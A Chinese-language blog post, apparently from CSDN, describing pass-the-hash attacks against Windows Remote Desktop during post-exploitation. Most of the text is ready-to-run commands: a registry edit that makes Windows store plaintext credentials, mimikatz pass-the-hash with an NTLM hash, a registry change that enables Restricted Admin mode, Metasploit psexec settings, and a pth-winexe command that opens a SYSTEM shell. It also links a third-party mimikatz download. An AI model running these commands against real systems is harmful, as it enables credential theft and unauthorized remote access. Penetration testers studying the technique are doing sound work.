后渗透之攻击RDP之利用凭据传递攻击(Path The Hash)

目录

1.直接利用 

2. 利用MSF工具PTH模块

2.1 psexec模块

2.2 kali集成的工具


在之前的文章中[后渗透之搞定RDP简析]介绍了关于Windows Server 2012之后的版本不存储明文密码。

但是依旧可以通过修改注册表和mimikatz来达到获取密文密码的目的

reg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1

1.直接利用 

       根据上述的方法确实可以获取到目标主机的密码并且成功登录到主机,但这个操作的风险其实是很高的,在本人测试的时候成功关了客户一台主机并且挤掉了业务系统的开发人员,所以该操作的风险太高,就算是最大权限的渗透执行这类操作也极易被发现。

       微软为了防止在Windows Server 2012R2之后的版本被攻击者在系统内存中抓取明文密码,使用了安全措施,但是该安全措施却造成了RDP的pth攻击。详细内容可以参考这边文章[远程桌面服务:启用受限管理模式],在获取到系统用户hash后,利用工具进行登录远程桌面,需要在mimikatz执行如下命令

privilege::debug
sekurlsa::pth /user:administrator /domain:192.168.163.109 /ntlm:79a7d376cba88ef8bb072042b0d6e0eb "/run:mstsc.exe /restrictedadmin"

如果目标机器没有开启Restricted Admin mode,可以使用以下命令开启。

REG ADD HKLM\System\CurrentControlSet\Control\Lsa /v DisableRestrictedAdmin /t REG_DWORD /d 00000000 /f 

2. 利用MSF工具PTH模块

2.1 psexec模块

使用模块

msf > use exploit/windows/smb/psexec
msf > set rhosts 192.168.163.109
msf > set SMBDomain WIN-JNPJJTM0FHT
msf > set SMBUser administrator
msf > set SMBPass 00000000000000000000000000000000:79a7d376cba88ef8bb072042b0d6e0eb
msf > run

2.2 kali集成的工具

 pth-winexe -U WIN-JNPJJTM0FHT/administrator%00000000000000000000000000000000:79a7d376cba88ef8bb072042b0d6e0eb --system --ostype=1 //192.168.163.109 cmd

本次使用的mimikatz是从GitHub上下载的2.2.0,俯下载链接如下:

https://download.csdn.net/download/Jietewang/20951692

本文参考文章:
https://mp.weixin.qq.com/s/mVSc5geSYwncpOda1OT-0g

  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 1
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值